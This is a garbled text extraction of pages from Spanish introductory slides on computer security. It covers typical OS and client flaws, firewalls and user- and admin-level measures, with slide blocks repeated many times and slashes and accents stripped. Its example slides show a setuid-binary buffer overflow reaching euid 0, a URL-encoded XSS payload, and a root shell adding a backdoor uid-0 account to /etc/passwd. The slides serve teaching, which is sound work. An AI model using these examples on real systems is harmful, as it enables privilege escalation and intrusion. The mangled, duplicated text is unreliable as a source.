$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 23: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

bull Ingleacutes

bull Programacioacuten (teoriacutea)

bull Lenguajes de alto nivel (SO - C)

bull Ensamblador (varios)

bull Manejo de sistemas operativos (niveles usuario programador y administrador)

bull Conocimiento de protocolos de comunicaciones

bull Conocimiento de aplicaciones tiacutepicas

bull Estudio de los fallos ya publicados

Conceptos baacutesicos

bull Cesioacuten de privilegios indiscriminada

bull Variables de entorno

bull Enlaces simboacutelicos

bull Condiciones de carrera

bull Desbordamiento

bull Relaciones de confianza

Conceptos baacutesicos

Fallos tiacutepicos en Sistemas Operativos

bull Automatizacioacuten excesiva Ejecucioacuten automaacutetica de aplicaciones locales con datos externos

bull Ejecucioacuten automaacutetica de coacutedigo externo Scripts incluidos en todo tipo de documentos (Ofimaacutetica HTML e-mail)

bull Aumento de importancia por el incremento de servicios viacutea Web XSSCSS

Conceptos baacutesicos

Fallos tiacutepicos en clientes

bull Conocimiento del sistema

bull Verificacioacuten de integridad

bull Protocolos cifrados

bull Revisioacuten de registros (rdquologsrdquo)

bull Paranoia Evitar ejecucioacuten de coacutedigo externo Aplicaciones ldquosegurasrdquo

Medidas de seguridad

A nivel de usuario

bull Passwords seguros

Medidas de seguridad

A nivel de usuario

lthttpwwwdilbertcomgt

bull Sistemas con niveles de acceso Trabajar sin privilegios especiales (pe MacOS X)

bull Eliminar servicios (pe SNMP)

bull Reglas de acceso Cortafuegos

bull Actualizaciones del sistema

bull Programacioacuten segura

Medidas de seguridad

A nivel de usuario

Medidas de seguridad

bull Control de acceso externo

bull Limita alcance de problemas de seguridad en serviciosredes locales

bull Limita la posibilidad de utilizar sistemas comprometidos para atacar a terceros

bull Limita la posibilidad de extraer informacioacuten

Cortafuegos (A Favor)

Medidas de seguridad

bull Dificultad de configuracioacuten correcta

bull Dificultad de instalacioacuten de nuevos servicios

bull Problemas con protocolos que usan puertos aleatorios

bull Ralentizacioacuten

bull Importancia relativa en maacutequinas sin servicios y con accesos controlados

Cortafuegos (En Contra)

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 24: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

bull Cesioacuten de privilegios indiscriminada

bull Variables de entorno

bull Enlaces simboacutelicos

bull Condiciones de carrera

bull Desbordamiento

bull Relaciones de confianza

Conceptos baacutesicos

Fallos tiacutepicos en Sistemas Operativos

bull Automatizacioacuten excesiva Ejecucioacuten automaacutetica de aplicaciones locales con datos externos

bull Ejecucioacuten automaacutetica de coacutedigo externo Scripts incluidos en todo tipo de documentos (Ofimaacutetica HTML e-mail)

bull Aumento de importancia por el incremento de servicios viacutea Web XSSCSS

Conceptos baacutesicos

Fallos tiacutepicos en clientes

bull Conocimiento del sistema

bull Verificacioacuten de integridad

bull Protocolos cifrados

bull Revisioacuten de registros (rdquologsrdquo)

bull Paranoia Evitar ejecucioacuten de coacutedigo externo Aplicaciones ldquosegurasrdquo

Medidas de seguridad

A nivel de usuario

bull Passwords seguros

Medidas de seguridad

A nivel de usuario

lthttpwwwdilbertcomgt

bull Sistemas con niveles de acceso Trabajar sin privilegios especiales (pe MacOS X)

bull Eliminar servicios (pe SNMP)

bull Reglas de acceso Cortafuegos

bull Actualizaciones del sistema

bull Programacioacuten segura

Medidas de seguridad

A nivel de usuario

Medidas de seguridad

bull Control de acceso externo

bull Limita alcance de problemas de seguridad en serviciosredes locales

bull Limita la posibilidad de utilizar sistemas comprometidos para atacar a terceros

bull Limita la posibilidad de extraer informacioacuten

Cortafuegos (A Favor)

Medidas de seguridad

bull Dificultad de configuracioacuten correcta

bull Dificultad de instalacioacuten de nuevos servicios

bull Problemas con protocolos que usan puertos aleatorios

bull Ralentizacioacuten

bull Importancia relativa en maacutequinas sin servicios y con accesos controlados

Cortafuegos (En Contra)

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 25: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

bull Automatizacioacuten excesiva Ejecucioacuten automaacutetica de aplicaciones locales con datos externos

bull Ejecucioacuten automaacutetica de coacutedigo externo Scripts incluidos en todo tipo de documentos (Ofimaacutetica HTML e-mail)

bull Aumento de importancia por el incremento de servicios viacutea Web XSSCSS

Conceptos baacutesicos

Fallos tiacutepicos en clientes

bull Conocimiento del sistema

bull Verificacioacuten de integridad

bull Protocolos cifrados

bull Revisioacuten de registros (rdquologsrdquo)

bull Paranoia Evitar ejecucioacuten de coacutedigo externo Aplicaciones ldquosegurasrdquo

Medidas de seguridad

A nivel de usuario

bull Passwords seguros

Medidas de seguridad

A nivel de usuario

lthttpwwwdilbertcomgt

bull Sistemas con niveles de acceso Trabajar sin privilegios especiales (pe MacOS X)

bull Eliminar servicios (pe SNMP)

bull Reglas de acceso Cortafuegos

bull Actualizaciones del sistema

bull Programacioacuten segura

Medidas de seguridad

A nivel de usuario

Medidas de seguridad

bull Control de acceso externo

bull Limita alcance de problemas de seguridad en serviciosredes locales

bull Limita la posibilidad de utilizar sistemas comprometidos para atacar a terceros

bull Limita la posibilidad de extraer informacioacuten

Cortafuegos (A Favor)

Medidas de seguridad

bull Dificultad de configuracioacuten correcta

bull Dificultad de instalacioacuten de nuevos servicios

bull Problemas con protocolos que usan puertos aleatorios

bull Ralentizacioacuten

bull Importancia relativa en maacutequinas sin servicios y con accesos controlados

Cortafuegos (En Contra)

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 26: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

bull Conocimiento del sistema

bull Verificacioacuten de integridad

bull Protocolos cifrados

bull Revisioacuten de registros (rdquologsrdquo)

bull Paranoia Evitar ejecucioacuten de coacutedigo externo Aplicaciones ldquosegurasrdquo

Medidas de seguridad

A nivel de usuario

bull Passwords seguros

Medidas de seguridad

A nivel de usuario

lthttpwwwdilbertcomgt

bull Sistemas con niveles de acceso Trabajar sin privilegios especiales (pe MacOS X)

bull Eliminar servicios (pe SNMP)

bull Reglas de acceso Cortafuegos

bull Actualizaciones del sistema

bull Programacioacuten segura

Medidas de seguridad

A nivel de usuario

Medidas de seguridad

bull Control de acceso externo

bull Limita alcance de problemas de seguridad en serviciosredes locales

bull Limita la posibilidad de utilizar sistemas comprometidos para atacar a terceros

bull Limita la posibilidad de extraer informacioacuten

Cortafuegos (A Favor)

Medidas de seguridad

bull Dificultad de configuracioacuten correcta

bull Dificultad de instalacioacuten de nuevos servicios

bull Problemas con protocolos que usan puertos aleatorios

bull Ralentizacioacuten

bull Importancia relativa en maacutequinas sin servicios y con accesos controlados

Cortafuegos (En Contra)

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 27: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

bull Passwords seguros

Medidas de seguridad

A nivel de usuario

lthttpwwwdilbertcomgt

bull Sistemas con niveles de acceso Trabajar sin privilegios especiales (pe MacOS X)

bull Eliminar servicios (pe SNMP)

bull Reglas de acceso Cortafuegos

bull Actualizaciones del sistema

bull Programacioacuten segura

Medidas de seguridad

A nivel de usuario

Medidas de seguridad

bull Control de acceso externo

bull Limita alcance de problemas de seguridad en serviciosredes locales

bull Limita la posibilidad de utilizar sistemas comprometidos para atacar a terceros

bull Limita la posibilidad de extraer informacioacuten

Cortafuegos (A Favor)

Medidas de seguridad

bull Dificultad de configuracioacuten correcta

bull Dificultad de instalacioacuten de nuevos servicios

bull Problemas con protocolos que usan puertos aleatorios

bull Ralentizacioacuten

bull Importancia relativa en maacutequinas sin servicios y con accesos controlados

Cortafuegos (En Contra)

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 28: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

bull Sistemas con niveles de acceso Trabajar sin privilegios especiales (pe MacOS X)

bull Eliminar servicios (pe SNMP)

bull Reglas de acceso Cortafuegos

bull Actualizaciones del sistema

bull Programacioacuten segura

Medidas de seguridad

A nivel de usuario

Medidas de seguridad

bull Control de acceso externo

bull Limita alcance de problemas de seguridad en serviciosredes locales

bull Limita la posibilidad de utilizar sistemas comprometidos para atacar a terceros

bull Limita la posibilidad de extraer informacioacuten

Cortafuegos (A Favor)

Medidas de seguridad

bull Dificultad de configuracioacuten correcta

bull Dificultad de instalacioacuten de nuevos servicios

bull Problemas con protocolos que usan puertos aleatorios

bull Ralentizacioacuten

bull Importancia relativa en maacutequinas sin servicios y con accesos controlados

Cortafuegos (En Contra)

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 29: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

Medidas de seguridad

bull Control de acceso externo

bull Limita alcance de problemas de seguridad en serviciosredes locales

bull Limita la posibilidad de utilizar sistemas comprometidos para atacar a terceros

bull Limita la posibilidad de extraer informacioacuten

Cortafuegos (A Favor)

Medidas de seguridad

bull Dificultad de configuracioacuten correcta

bull Dificultad de instalacioacuten de nuevos servicios

bull Problemas con protocolos que usan puertos aleatorios

bull Ralentizacioacuten

bull Importancia relativa en maacutequinas sin servicios y con accesos controlados

Cortafuegos (En Contra)

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 30: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

Medidas de seguridad

bull Dificultad de configuracioacuten correcta

bull Dificultad de instalacioacuten de nuevos servicios

bull Problemas con protocolos que usan puertos aleatorios

bull Ralentizacioacuten

bull Importancia relativa en maacutequinas sin servicios y con accesos controlados

Cortafuegos (En Contra)

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 31: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

